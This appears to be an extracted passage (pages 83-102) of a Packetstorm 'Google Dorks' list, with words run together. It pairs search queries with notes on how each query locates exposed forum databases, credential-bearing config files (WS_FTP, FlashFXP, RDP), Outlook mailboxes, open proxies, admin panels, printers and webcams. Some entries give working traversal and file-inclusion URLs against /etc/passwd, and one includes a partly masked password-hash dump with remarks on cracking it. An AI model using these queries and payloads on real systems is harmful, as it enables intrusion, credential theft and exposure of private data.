IkonBoard(http://www.ikonboard.com/) is acomprehensive web bulletin boardsystem, implemented as a Perl/CGIscript.There is a flaw in the Perl codethat cleans up user input beforeinterpolating it into a string which getspassed to Perl's eval() function,allowing an attacker to evaluatearbitrary Perl and hence run arbitrarycommands.More info at:http://www.securitytracker.com/alerts/2003/Apr/1006446.htmlThe bug wasfixed in 3.1.2.

inurl:snitz_forums_2000.mdb inurl:snitz_forums_2000.mdb

The SnitzTM Forums 2000 Version3.4.04 Installation Guide and Readmesays: "it is strongly recommended thatyou change the default database namefrom snitz_forums_2000.mdb to acryptic or not easy to guess name."Of

Page 83: Packetstorm Google Dorks List

course, we know readme's are forlamers.. right admins ?[murfie@forofogoogledorks]$ mdb-exportsnitz_forums_2000.mdbFORUM_MEMBERSMEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL,[etc]1,1,"adminadmin","58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e","[email protected]"," "," ","","",1,1,1,3," "," ","","20030918120147",2,"20030918120207","20030918120224","ForumAdmin","10.xx.xx.72",0,0,1,"000.000.000.000","","","","","","","","","","","",""," ","",""," ","","","","",1(data xx'd atsome points) The password hash valueis a SHA256 encoded string (with nosalting). Every attacker knows they canbe broken with a dictionary attackusing a very simpel perl or Cprogram.http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt

WebAPP directorytraversal

inurl:/cgi-bin/index.cgi inurl:topicsinurl:viewca

WebAPP is advertised as the internet'smost feature rich, easy to run PERLbased portal system. The WebAPPsystem has a serious reverse directorytraversal vulnerabilityhttp:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00Detailedinfo :http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txtCreditsgoes to PhTeam for discovering thisvulnerability.

filetype:rdp rdp filetype:rdp rdp

These are Remote Desktop Connection(rdp) files. They contain the settingsand sometimes the credentials toconnect to another windows computerusing the RDP protocols.

filetype:reg"Terminal Server

filetype:reg "Terminal ServerClient"

These are Microsoft Terminal Servicesconnection settings registry files. They

Page 84: Packetstorm Google Dorks List

Client" may sometimes contain encryptedpasswords and IP addresses.

inurl:"nph-proxy.cgi" "Startbrowsing throughthis CGI-basedproxy"

inurl:"nph-proxy.cgi" "Startbrowsing through this CGI-basedproxy"

Observing the web cracker in the wild,one feels like they are watching a bear.Like a bear stocks up on food and thenhibernates, a web cracker must stockup on proxies, and then hack until theyrun out.Web crackers are a distinctbreed, and many do not comfort wellwith the draconian measures that manyother crackers take, such as port andservice scanning, the modern webcracker finds such tactics much toointrusive. This leaves the web crackerwith the only viable option to come incontact with a large number of proxiesbeing to use public proxy lists. Theseare of course very slow, and very veryunstable, and do not allow the crackermuch time between his proxyruns.Luckily google gives them anotheroption, if they are smart enough to findit.CGI-proxy (http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application.It runs on a web server, and acts as anhttp proxy, in CGI form. A prudent siteowner would hide it behind .htaccess,as most do, but with a powerful toollike google, the inprudent few wholeave it open can quickly be seperatedfrom the wise masses.CGI-proxy'sdefault page contains the text, as youcan see in the demo on their site:"Startbrowsing through this CGI-basedproxy by entering a URL below. OnlyHTTP and FTP URLs are supported.Not all functions will work (e.g. someJavaScript), but most pages will befine."The proxy as it resides on a serveris most often called nph-proxy.cgi. Aweb cracker can now use google toenumerate his list of proxy servers, likeso:inurl:"nph-proxy.cgi" "Startbrowsing through this CGI-basedproxy"More results can be obtained by

Page 85: Packetstorm Google Dorks List

admitting the "inurl:nph-proxy.cgi"constraint, but much more trash isgenerated as well.

intitle:"Index of *"inurl:"my sharedfolder" sizemodified

intitle:"Index of *" inurl:"my sharedfolder" size modified

These are index pages of "My SharedFolder". Sometimes they contain juicystuff like mp3's or avi files. Who needspay sites for music when you gotGoogle ? :) Uhm, well except for thecopyright issue.

E-market remotecode execution

inurl:"/becommunity/community/index.php?pageurl="

E-market is commercial software madeby a koreancompany(http://www.bbs2000.co.kr).A vulnerability in this software wasreported to Bugtraq. The exploit ispossible with the index.phpscript:http://[TARGET]/becommunity/community/index.php?pageurl=[injectionURL]http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL] For moreinformation readthis:http://echo.or.id/adv/adv06-y3dips-2004.txt Author: y3dipsDate: Sept, 7th2004Location: Indonesian, Jakarta

filetype:potinurl:john.pot filetype:pot inurl:john.pot

John the Ripper is a popular crackingprogram every hacker knows. It'sresults are stored in a file calledjohn.pot.This search finds such resultsfiles, currently only one. Also Noresults for the distributed john version(djohn.pot) today :)PS: This was postedto the "fun" forum, so don't take thistoo seriously !

Galleryconfigurationsetup files

intitle:gallery inurl:setup "Galleryconfiguration"

Gallery is a popular images packagefor websites. Unfortunately, with somany users, more bugs will be foundand Google will find moreinstallations. This search finds Gallerysites that seem to have left more or lessdangerous files on their servers, likeresetadmin.php and others.We call itGallery in Setup mode :)

filetype:xls filetype:xls inurl:"email.xls" Our forum members never get tired of

Page 86: Packetstorm Google Dorks List

inurl:"email.xls" finding juicy MS office files. Here'sone by urban that finds emailaddresses.

filetype:pdb pdbbackup (Pilot |Pluckerdb)

filetype:pdb pdb backup (Pilot |Pluckerdb)

Hotsync database files can be foundusing "All databases on a Palm device,including the ones you create using NSBasic/Palm, have the same format.Databases you create using NSBasic/Palm have the backup bit set bydefault, so they are copied to your"x:\palm\{username}\backup"Theforum members suggested adding Pilotand Pluckerdb (linux software for pda),so the results are more clean. (pdb filescan be used for protein databases,which we don't want to see).Currentlywe don't know of a program to "read"these binary files.

filetype:pl"Download: SuSELinuxOpenexchangeServer CA"

filetype:pl "Download: SuSE LinuxOpenexchange Server CA"

this search will get you on the webadministration portal of linux openexchange servers.

intitle:"dreamboxweb" intitle:"dreambox web"

this search will show webadministration interfaces of linuxdream boxes.The Dreambox is one ofthe popular 3rd generation boxes.Based on a powerful IBM PowerPC(not PC !) with an MPEG1/2 hardwaredecoder, this box is FULLY open, withan open source Linux operatingsystem. The Dreambox not only offershigh quality video and audio, but alsohas a variety of connections to theoutside world: Ethernet, USB, PS2,Compact Flash and two Smartcardreaders. The box can handle any dishconfiguration, an unlimited number ofchannels or satellites, has a very fastchannel scan, allows for direct digitalrecording, etc.

PHP-Nuke - createsuper user rightnow !

"create the Super User" "now byclicking here"

PHP-Nuke is a popular web portalthingie. It has popped up in the Googledorks before. I think we let this onedescribe itself, quoting from a

Page 87: Packetstorm Google Dorks List

vulnerable page:"Welcome to PHP-Nuke!Congratulations! You have nowa web portal installed!. You can edit orchange this message from theAdministration page. For securityreasons the best idea is to create theSuper User right NOW by clickingHERE."

filetype:aspDBQ=" *Server.MapPath("*.mdb")

filetype:asp DBQ=" *Server.MapPath("*.mdb")

This search finds sites using MicrosoftAccess databases, by looking for thethe database connection string. Thereare forums and tutorials in the results,but also the real databases. An attackercan use this to find the name andlocation of the database and downloadit for his viewing pleasure, which maylead to information leakage or worse.

intitle:"TUTOSLogin" intitle:"TUTOS Login"

TUTOS stands for "The Ultimate TeamOrganization Software." This searchfinds the login portals toTUTOS.Adding scheme.php in the/php/ directory seems to allow coolthings. There seems to be a footholdfor SQL table structures and, uponerrors, directory structure of the server.It is said that with the username linusand the password guest you can seewhat it looks like when your logged in.This is unconfirmed as of now.

"Login toUsermin"inurl:20000

"Login to Usermin" inurl:20000

Usermin is a web interface that can beused by any user on a Unix system toeasily perform tasks like reading mail,setting up SSH or configuring mailforwarding. It can be thought of as asimplified version of Webmin designedfor use by normal users rather thansystem administrators.

filetype:lit lit(books|ebooks) filetype:lit lit (books|ebooks)

Tired of websearching ? Wantsomething to read ? You can findEbooks (thousands of them) with thissearch..LIT files can be opened withMicrosoft Reader(http://www.microsoft.com/reader/)

"Powered *: "Powered *: newtelligence" DasBlog is reportedly susceptible to an

Page 88: Packetstorm Google Dorks List

newtelligence"("dasBlog 1.6"|"dasBlog 1.5"|"dasBlog1.4"|"dasBlog1.3")

("dasBlog 1.6"| "dasBlog 1.5"|"dasBlog 1.4"|"dasBlog 1.3")

HTML injection vulnerability in itsrequest log. This vulnerability is due toa failure of the application to properlysanitize user-supplied input data beforeusing it in the generation of dynamicweb pages. Versions 1.3 - 1.6 arereported to bevulnerable.More:http://www.securityfocus.com/bid/11086/discussion/

Lotus Dominoaddress books inurl:"/names.nsf?OpenDatabase"

This search will return any LotusDomino address books which may beopen to the public. This can contain alot of detailed personal info you don'twant to fall in the hands of yourcompetitors or hackers. Most of themare password protected.

intitle:"Login -powered by EasyFile Sharing WebServer"

intitle:"Login - powered by EasyFile Sharing Web

Easy File Sharing Web Server is a filesharing software that allows visitors toupload/download files easily through aWeb Browser (IE,Netscape,Operaetc.)". More information at:http://www.securityfocus.com/bid/11034/discussion/An attacker canreportedly bypass the authentication byentering the the name of the virtualfolder directly.

intitle:"TomcatServerAdministration"

intitle:"Tomcat ServerAdministration"

This finds login portals for ApacheTomcat, an open source Java servletcontainer which can run as astandalone server or with an Apacheweb server.

ez Publishadministration

Admin intitle:"eZ publishadministration"

Thousands of enterprises,governmental offices, non-profitorganizations, small and middle sizedcompanies and educational institutionsaround the world trust eZ publish forrunning their web solutions.Vendorsite: http://www.ez.no/Vulnerabilities:http://search.securityfocus.com/swsearch?query=ez+publish&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodifiedDepending on theversion two queries can usedAdminintitle:"eZ publishadministration"intitle:"Login"

Page 89: Packetstorm Google Dorks List

"Welcome to eZ publishadministration"Crosssite Scriting,Information Disclosure, Pathdisclosureavailable on older versions

inurl:administrator"welcome tomambo"

inurl:administrator "welcome tomambo"

Mambo is a full-featured contentmanagement system that can be usedfor everything from simple websites tocomplex corporate applications.Continue reading for a detailed featurelist.Vendor:http://www.mamboserver.com/CrossSite Scripting and SQL injection existin some versions 4.5 current version is4.5.1RC3 Vulnerabilities:http://search.securityfocus.com/swsearch?query=mambo+open+source&sbm=bid&submit=Search%21&metaname=alldoc

"Powered by DCP-Portal v5.5" "Powered by DCP-Portal v5.5"

DCP-Portal is more a communitysystem than a CMS - it neverthelesscalls itsself CMS. They have neverseen a real CMS. Version 5.5 isvulnerable sql injection.Vulnerabilities:http://search.securityfocus.com/swsearch?query=dcp-portal&sbm=bid&submit=Search%21&metaname=alldoc

inurl:"typo3/index.php?u=" -demo inurl:"typo3/index.php?u=" -demo

TYPO3 is a free Open Source contentmanagement system for enterprisepurposes on the web and in intranets,featuring a set of ready-madeinterfaces, functions andmodules.Vendor:http://www.typo3.com/Vulns:http://search.securityfocus.com/swsearch?query=Typo3&sbm=bid&submit=Search%21&metaname=alldoc

intitle:index.of(inurl:fileadmin |intitle:fileadmin)

intitle:index.of (inurl:fileadmin |intitle:fileadmin)

TYPO3 is a free Open Source contentmanagement system for enterprisepurposes on the web and in intranets,featuring a set of ready-madeinterfaces, functions and modules.Thefileadmin directory is the storage for alluser data like website templates,graphics, documents and so on.

Page 90: Packetstorm Google Dorks List

Normally no sensitive data will bestored here except the one madeavailable in restrictedareas.Unprotected fileadmin directoriescan be found by an attacker using thisquery.Vendor: http://www.typo3.com/

Quicksitedemopages forTypo3

"FC Bigfeet" -inurl:mail

TYPO3 is a free Open Source contentmanagement system for enterprisepurposes on the web and in intranets,featuring a set of ready-madeinterfaces, functions and modules.Thequicksite package is a demosite fortypo3. Quicksite or Testsite will installa complete website of a soccerclubusing the followingcredentials:user:adminpassword:passwordIf you want to login, again append"typo3" to the website dir.Vendor:http://www.typo3.com/An attacker willconsider this as yet another way to findTypo3 hosts for which security focuslists vulnerabilities.

site:netcraft.comintitle:That.Site.Running Apache

site:netcraft.comintitle:That.Site.Running Apache

Netcraft reports a site's operatingsystem, web server, and netblockowner together with, if available, agraphical view of the time since lastreboot for each of the computersserving the site. So, Netcraft scansWeb servers, Google scans Netcraft,and the hacker scans Google.Thissearch is easily modified (replace"apache" for the other server software),thus adding yet another way to find thewebserver software version info.

ext:log "Software:Microsoft InternetInformationServices *.*"

ext:log "Software: MicrosoftInternet Information Services *.*"

Microsoft Internet InformationServices (IIS) has log files that arenormally not in the docroot, but thenagain, some people manage to sharethem. An attacker may use these togather: loginnames (FTP service),pathinformation, databasenames, andstuff..Examples:12:09:37194.236.57.10 [2501]USER micze33112:09:38 194.236.57.10[2501]PASS - 23008:30:38

Page 91: Packetstorm Google Dorks List

194.236.57.10 [2416]DELE com-gb97.mdb2000-06-18 15:08:30200.16.212.225 activeip\carpinchos4.22.121.13 80 POST/_vti_bin/_vti_aut/author.dll - 200 2958551 120 MSFrontPage/4.0 -

filetype:cgiinurl:tseekdir.cgi filetype:cgi inurl:tseekdir.cgi

The Turbo Seek search engine has avulnerability. The removed user canlook at the contents of files on target. Aremoved user can request an URL withname of a file, which follows NULLbyte (%00) to force system to displaythe contents of a required file, forexample:/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00 More:http://www.securitytracker.com/alerts/2004/Sep/1011221.html

"Powered byphpOpenTracker"Statistics

"Powered by phpOpenTracker"Statistics

phpOpenTracker is a frameworksolution for the analysis of websitetraffic and visitor analysis. More info atthe vendor site:http://www.phpopentracker.de/en/index.phpA prebuild sample report isshipped with PhpOpenTracker which isused by most sites. This report does notuse all possibilities of the frameworklike user tracking.

filetype:vcs vcs filetype:vcs vcs

Filext.com says: "Various programsuse the *.VCS extension; too many tolist individually. Take clues from thelocation of the file as a possible pointerto exactly which program is producingthe file. The file's date and time canalso help if you know which programsyou were running when the file waswritten."The most common use is the"vCalendar File", used by Outlook forexample. It can also belong to a "PalmvCal Desktop Application". For thosewho prefer clean searches, try thesevariations (with less results):"PRODID:PalmDesktop Generated"filetype:vcs

Page 92: Packetstorm Google Dorks List

VCALENDAR filetype:vcsBEGIN:VCALENDAR

filetype:configconfigintext:appSettings"User ID"

filetype:config configintext:appSettings "User ID"

These files generally containconfiguration information for a .NetWeb Application. Things likeconnection strings to databases filedirectories and more. On a properlysetup IIS these files are normally notserved to the public.

inurl:"/catalog.nsf"intitle:catalog inurl:"/catalog.nsf" intitle:catalog

This will return servers which arerunning versions of Lotus Domino. Thecatalog.nsf is the servers DB catalog. Itwill list all the DB's on the server andsometimes some juicy info too. Anattacker can back the url down to the"/catalog.nsf" part if needed.

filetype:pstinurl:"outlook.pst" filetype:pst inurl:"outlook.pst"

All versions of the popular businessgroupware client called Outlook havethe possibility to store email, calendersand more in a file for backup ormigration purposes.An attacker maylearn a great deal about the owner orthe company by downloading thesefiles and importing them in his ownclient for his viewing pleasure.

"index of/""ws_ftp.ini""parent directory"

"index of/" "ws_ftp.ini" "parentdirectory"

This search is a cleanup of a previousentry by J0hnny. It uses "parentdirectory" to avoid results other thandirectory listings.WS_FTP.ini is aconfiguration file for a popular win32FTP client that stores usernames andweakly encoded passwords. There isanother way to find this file, that wasadded by Xewan:filetype:ini ws_ftppwdIn our experience it's good to tryboth methods, as the results will differquite a bit.

filetype:phpinurl:index.phpinurl:"module=subjects"inurl:"func=*"(listpages|viewpage | listcat)

filetype:php inurl:index.phpinurl:"module=subjects"inurl:"func=*" (listpages| viewpage| listcat)

Reportedly the PostNuke ModulesFactory Subjects module is affected bya remote SQL injection vulnerability.http://securityfocus.com/bid/11148/discussion/

Page 93: Packetstorm Google Dorks List

W-Nailer UploadArea uploadpics.php?did= -forum

What is W-Nailer?W-Nailer is a PHPscript which can create galleries foryou.It uses a graphical library (GD)which enables PHP to manipulateimages, for instance resizing to createthumbnails.W-Nailer is highlyconfigurable to meet your needs. Evenbetter, the configuration is nearlycompletely webbased.So after you haveuploaded your files, you will just needyour browser!

filetype:cgiinurl:pdesk.cgi filetype:cgi inurl:pdesk.cgi

PerlDesk is a web based help desk andemail management applicationdesigned to streamline supportrequests, with built in tracking andresponselogging.http://www.securitytracker.com/alerts/2004/Sep/1011276.html

ext:ldif ldif ext:ldif ldif

www.filext.com says LDIF = LDAPData Interchange Format.LDAP is usedfor nearly everything in our days, sothis file may include some juice infofor attackers. They can addINTEXT:keyword to get more specifictargets.

inurl:mewebmail inurl:mewebmail

MailEnable Standard Edition providesrobust SMTP and POP3 services forWindows NT/2000/XP/2003 systems.This version is free for both personaland commercial usage and does nothave any time, user or mailboxrestrictions.This search is a portalsearch. If finds the logins screens. If avulnerability is found, this searchbecomes the target base for an attacker.

"Powered byIceWarpSoftware"inurl:mail

"Powered by IceWarp Software"inurl:mail

IceWarp Web Mail is reported prone tomultiple input validationvulnerabilities. Few details regardingthe specific vulnerabilities are known.These vulnerabilities are reported toaffect all versions of IceWarp WebMail prior to version 5.2.8.There aretwo ways to find installations ofIceWarp:"Powered by IceWarpSoftware" inurl:mailintitle:"IceWarp

Page 94: Packetstorm Google Dorks List

Web Mail"inurl:":32000/mail/"http://www.securityfocus.com/bid/10920

inurl:/_layouts/settings inurl:/_layouts/settings

With the combined collaborationfeatures of Windows SharePointServices and SharePoint Portal Server2003, users in an organization cancreate, manage, and build collaborativeWeb sites and make them availablethroughout the organization. Moreinformation is available at :http://www.microsoft.com/sharepoint/Loads of company info can be gainedby an attacker when the URL's areunprotected. Furthermore unprotectedsharepoint sites give full "Edit, Addand Delete access" to the information,which in case of malicious users maycause loss of important data.

intitle:"MRTG/RRD" 1.1*(inurl:mrtg.cgi |inurl:14all.cgi|traffic.cgi)

intitle:"MRTG/RRD" 1.1*(inurl:mrtg.cgi | inurl:14all.cgi|traffic.cgi)

The remote user can reportedly viewthe first string of any file on the systemwhere script installed. This is a veryold bug, but some sites never upgradedtheir MRTGinstallations.http://www.securitytracker.com/alerts/2002/Feb/1003426.htmlAnattacker will find it difficult to exploitthis in any usefull way, but it doesexpose one line of text from a file, forexample (using the file /etc/passwd)shows this:ERROR: CFG ErrorUnknown Option "root:x:0:1:super-user:/" on line 2 or above.

filetype:mdbwwforum filetype:mdb wwforum

Web Wiz Forums is a free ASPBulletin Board software package. Ituses a Microsoft Access database forstorage. The installation instructionsclearly indicate to change the defaultpath and filename(admin/database/wwForum.mdb).vendor:http://www.webwizguide.info/web_wiz_forums/The forum database containsthe members passwords, eitherencrypted or in plain text, depending

Page 95: Packetstorm Google Dorks List

on the version.Please note: this searchis proof that results can stay inGoogle's index for a long time, evenwhen they are not on the site anylonger. Currently only 2 out of 9 areactually still downloadable by anattacker.

"Powered By EliteForum Version*.*"

"Powered By Elite Forum Version*.*"

Elite forums is one of those MicrosoftAccess .mdb file based forums. Thisone is particularly dangerous, becausethe filename and path are hardcoded inthe software. An attacker can modifyindex.php for ./data/users/userdb.dat,open the file and see something likethis:42administrat4571XXX367b52XXXb33b6ce74df1e0170(data wasxx'd)These are MD5 digests and can bebrute forced (with enough time) ordictionary cracked by a malicious user,thus giving adminstrator access to theforum.

intitle:"microsoftcertificateservices"inurl:certsrv

intitle:"microsoft certificateservices" inurl:certsrv

Microsoft Certificate ServicesAuthority (CA) software can be used toissue digital certificates. These areoften used as "proof" that someone orsomething is what they claim they are.The Microsoft certificates are meant tobe used with IIS for example withOutlook Web Access. The users ofthese certificates have to decide if theytrust it or not. If they do, they canimport a root certificate into theirbrowsers (IE).Anyways, this search byJimmyNeutron uncovers a few of thesecertificate servers directly connected tothe Internet. Which (in theory) meansanyone could issue a certificate fromthese sites and abuse it to misleadwebsurfers in phishing scams and such.

intitle:"webadmin- /*" filetype:phpdirectory filenamepermission

intitle:"webadmin - /*" filetype:phpdirectory filename permission

Webadmin.php is a free simple Web-based file manager. This search findssites that use this software. If leftunprotected an attacker files can bemodified or added on the server.Moreinfo and screenshot at:

Page 96: Packetstorm Google Dorks List

http://cker.name/webadmin/

intitle:AnswerBook2 inurl:ab2/(inurl:8888 |inurl:8889)

intitle:AnswerBook2 inurl:ab2/(inurl:8888 | inurl:8889)

First of all this search indicates solarismachines and second the webservice isvulnerable to a format stringattack.Sun's AnswerBook 2 utilizes athird-party web server daemon(dwhttpd) that suffers from a formatstring vulnerability. The vulnerabilitycan be exploited to cause the webserver process to execute arbitrarycode. The web server runs as user andgroup 'daemon' who, under recentinstallations of Solaris, owns no criticalfileshttp://www.securiteam.com/unixfocus/5SP081F80K.htm

More Axisnetcams !

intitle:"Live View / - AXIS" |inurl:view/view.sht

More Axis Netcams, this searchcombines the cams with the defaulttitle (Live View) and extends it bysearching for the "view/view.shtml"URL identifier. Models found with thissearch are:AXIS 205 version 4.02AXIS206M Network Camera version4.10AXIS 206W Network Cameraversion 4.10AXIS 211 NetworkCamera version 4.02AXIS 241S VideoServer version 4.02AXIS 241Q VideoServer version 4.01Axis 2100 NetworkCameraAxis 2110 Network Camera2.34Axis 2120 Network Camera2.40AXIS 2130R PTZ NetworkCamera

intitle:"The AXIS200 Home Page" intitle:"The AXIS 200 Home Page"

The Axis 200 HOME pages residewithin the AXIS 200 device and holdinformation about the current softwareversion, technical documentation, somehowto's and the device settings.

Konica NetworkPrinterAdministration

intitle:"network administration"inurl:"nic"

This finds Konica Network PrinterAdministration pages. There is oneresult at the time of writing.

Aficio 1022 inurl:sts_index.cgi

The Ricoh Aficio 1022 is a digitalmultifunctional B&W copier, easilyupgraded to include network printing,network scanning, standard/LANfaxing and storage capabilities.

Page 97: Packetstorm Google Dorks List

intitle:RICOHintitle:"NetworkAdministration"

intitle:RICOH intitle:"NetworkAdministration"

Network Administration pages forseveral Ricoh Afficio printer models,for example the Aficio 1018D andRICOH LASER AP1600.

intitle:"lantronixweb-manager" intitle:"lantronix web-manager"

The Lantronix web manager homepages show the print serverconfiguration (Server Name, BootCode Version, Firmware, Uptime,Hardware Address, IP Address andSubnet Mask). The other setting pagesare password protected.

CanonImageReadymachines

intitle:"remote ui:top page"The "large" Canon ImageReadymachines with model versions 3300,5000 & 60000.

((inurl:ifgraph"Page generatedat") OR ("Thispage was builtusing ifgraph"))

((inurl:ifgraph "Page generated at")OR ("This page was built usingifgraph"))

ifGraph is a set of perl scripts that werecreated to fetch data from SNMPagents and feed a RRD file (RoundRobin Database) so that graphics canbe created later. The graphics and thedatabases are created using a toolcalled RRDTool.

ext:cgi intext:"nrg-" " This web pagewas created on "

ext:cgi intext:"nrg-" " This webpage was created on "

NRG is a system for maintaining andvisualizing network data and otherresource utilization data. It automatesthe maintenance of RRDtool databasesand graph web pages (that look likeMRTG web pages.)

+":8080" +":3128"+":80" filetype:txt

+":8080" +":3128" +":80"filetype:txt

With the string [+":8080" +":3128"+":80" filetype:txt] it is possible to findhuge lists of proxies... So, I've written asimple shell script that checks theselists and filters out the not respondingproxies. It also stores time response inanother file, so you can choose onlyfast proxies. Furthermore it can controlthe zone of the proxy with a simplewhois grep... The script proxytest.sh ison mywebsite:http://rawlab.relay.homelinux.net/programmi/proxytest.sh

ReMOSitorymodule forMambo

inurl:com_remository

It is reported that the ReMOSitorymodule for Mambo is prone to an SQLinjection vulnerability. This issue isdue to a failure of the module to

Page 98: Packetstorm Google Dorks List

properly validate user supplied URIinput. Because of this, a malicious usermay influence database queries in orderto view or modify sensitiveinformation, potentially compromisingthe software or the database. It may bepossible for an attacker to disclose theadministrator password hash byexploiting this issue.Full report:http://www.securityfocus.com/bid/11219Klouw suggests:inurl:index.php?option=com_remository&Itemid= Renegade added : ".. to getan administrator login, change the urltohttp://www.example.com/administrator.. it will pop up an login box...

inurl:cgi.asx?StoreID inurl:cgi.asx?StoreID

BeyondTV is a web based softwareproduct which let you manage your TVstation. All you need is to install a TVtuner card on your PC and Connectyour TV source (i.e. television antenna)to your TV tuner card. With a installedBeyondTV version you can nowadministrate your TV with yourbrowser even over the internet.

inurl:hp/device/this.LCDispatcher inurl:hp/device/this.LCDispatcher This one gets you on the web interface

of some more HP Printers.

intitle:"WordPress> * > Login form"inurl:"wp-login.php"

intitle:"WordPress > * > Loginform" inurl:"wp-login.php"

WordPress is a semantic personalpublishing platform.. it suffers from apossible XSSattacks.http://www.securityfocus.com/bid/11268/info/

intitle:webeyeinurl:login.ml intitle:webeye inurl:login.ml This one gets you on the webinterface

of Webeye webcams.

inurl:"comment.php?serendipity" inurl:"comment.php?serendipity"

serendipity is a weblog/blog system,implemented with PHP. It is standardscompliant, feature rich and opensource.For an attacker it is possible toinject SQLcommands.http://www.securityfocus.com/bid/11269/discussion/

"Powered by AJ-Fork v.167" "Powered by AJ-Fork v.167" AJ-Fork is, as the name implies - a

fork. Based on the CuteNews 1.3.1

Page 99: Packetstorm Google Dorks List

core, the aim of the project is toimprove what can be improved, andextend what can be extended withoutadding too much bloat (in fierceopposition to the mainstreamblogging/light publishing tools oftoday). The project aims to bebackwards-compatible with CuteNewsin what areas are sensible. It isvulnerable for a full path disclosure.http://www.securityfocus.com/bid/11301

"Powered byMegabook *"inurl:guestbook.cgi

"Powered by Megabook *"inurl:guestbook.cgi

MegaBook is a web-based guestbookthat is intended to run on Unix andLinux variants. MegaBook is prone tomultiple HTML injectionvulnerabilities.http://www.securityfocus.com/bid/8065

intitle:"axisstorpoint CD"intitle:"ip address"

intitle:"axis storpoint CD" intitle:"ipaddress"

Axis' network CD/DVD servers arefaster, less costly and easier to managethan using full-blown file servers fornetworking CD/DVD collections. Anyorganization that relies heavily onCD/DVD-based information canbenefit from an AXIS StorPoint CD+.

intitle:"oMail-adminAdministration -Login" -inurl:omnis.ch

intitle:"oMail-admin Administration- Login" -inurl:omnis.ch

oMail-webmail is a Webmail solutionfor mail servers based on qmail andoptionally vmailmgr or vpopmail. Themail is read directly from maildirs onthe hard disk, which is much quickerthan using protocols like POP3 orIMAP. Other features includes multiplelanguage support (English, French,German, Japanese, Chinese, and manymore), HTML and pictures inlinedisplay, folders, and address booksupport.

inurl:"map.asp?"intitle:"WhatsUpGold"

inurl:"map.asp?" intitle:"WhatsUpGold"

"WhatsUp Gold's new SNMP Viewertool enables Area-Wide to easily trackvariables associated with any port on anetwork device. With a few simpleclicks, a network engineer can selectdevice ports, navigate trees, and graphvariables in real time. For instance,

Page 100: Packetstorm Google Dorks List

Area-Wide can track bandwidth orCPU utilization on a router to aid incapacity and resource management."

inurl:"WWWADMIN.PL"intitle:"wwwadmin"

inurl:" WWWADMIN.PL"intitle:"wwwadmin"

wwwadmin.pl is a script that allows auser with a valid username andpassword, to delete files and posts fromthe associated forum.

inurl:odbc.iniext:ini -cvs inurl:odbc.ini ext:ini -cvs

This search will show the googlerODBC client configuration files whichmay containusernames/databases/ipaddresses andwhatever.

intitle:"Web DataAdministrator -Login"

intitle:"Web Data Administrator -Login"

The Web Data Administrator is autility program implemented inASP.NET that enables you to easilymanage your SQL Server datawherever you are. Using its built-infeatures, you can do the following fromInternet Explorer or your favorite Webbrowser. Create and edit databases inMicrosoft SQL Server 2000 orMicrosoft SQL Server 2000 DesktopEngine (MSDE) Perform ad-hocqueries against databases and savethem to your file system Export andimport database schema and data.

intitle:"Object notfound" netware"apache 1.."

intitle:"Object not found" netware"apache 1.."

This search will show netware apachewebservers as the result.

intitle:"switchhome page" "ciscosystems" "Telnet -to"

intitle:"switch home page" "ciscosystems" "Telnet - to"

Most cisco switches are shipped with aweb administration interface. If aswitch is reachable from the internetand google cashed it this search willshow it.

intitle:"DEFAULT_CONFIG - HP" intitle:"DEFAULT_CONFIG - HP" searches for the web interface of HP

switches.

"Powered byyappa-ng" "Powered by yappa-ng"

yappa-ng is a very powerful but easy toinstall and easy to use online PHPphoto gallery for all Operating Systems(Linux/UNIX, Windows, MAC, ...),and all Webservers (Apache, IIS, ...)with no need for a DataBase (noMySQL,...).yappa-ng is prone to a

Page 101: Packetstorm Google Dorks List

security vulnerability in the AddOnthat shows a random image from anyhomepage. This issue may letunauthorized users access images fromlockedalbums.http://www.securityfocus.com/bid/11314

"Active WebcamPage" inurl:8080 "Active Webcam Page" inurl:8080

Active WebCam is a sharewareprogram for capturing and sharing thevideo streams from a lot of videodevices. Known bugs: directorytraversal and cross site scripting

inurl:changepassword.cgi -cvs inurl:changepassword.cgi -cvs

Allows a user to change his/herpassword for authentication to thesystem. Script allows for repeatedfailed attempts making this scriptvulnerable to brute force.

filetype:iniinurl:flashFXP.ini filetype:ini inurl:flashFXP.ini

FlashFXP offers the easiest and fastestway to transfer any file using FTP,providing an exceptionally stable androbust program that you can alwayscount on to get your job done quicklyand efficiently. There are many, manyfeatures available in FlashFXP.TheflashFXP.ini file is its configurationfile and may containusernames/passwords and everythingelse that is needed to use FTP.

inurl:shopdbtest.asp inurl:shopdbtest.asp

shopdbtest is an ASP page used byseveral e-commerce products. Avulnerability in the script allowsremote attackers toview the databaselocation, and since that is usuallyunprotected, the attacker can thendownload the web site's database bysimly clicking on a URL (that displaysthe active database). The pageshopdbtest.asp is visible to all the usersand contains the full configurationinformation. An attacker ca thereforedownload the MDB (MicrosoftDatabase file), and gain access tosensitive information about orders,users, password, ect.

Page 102: Packetstorm Google Dorks List

"Powered by A-CART" "Powered by A-CART"

A-CART is an ASP shopping cartapplication written in VBScript. It iscomprised of a number of ASP scriptsand an Access database. A securityvulnerability in the product allowsremote attackers to download theproduct's database, thus gain access tosensitive information about users of theproduct (name, surname, address, e-mail, credit card number, and user'slogin-password).http://www.securityfocus.com/bid/5597 (search SF for more)

"Online Store -Powered byProductCart"

"Online Store - Powered byProductCart"

ProductCart is "an ASP shopping cartthat combines sophisticated ecommercefeatures with time-saving storemanagement tools and remarkable easeof use. It is widely used by many e-commerce sites". Multiple SQLinjection vulnerabilities have beenfound in the product, they allowanything from gaining administrativeprivileges (bypassing the authenticationmechanism), to executing arbitrarycode.http://www.securityfocus.com/bid/8105 (search SF for more)

"More Info aboutMetaCart Free" "More Info about MetaCart Free"

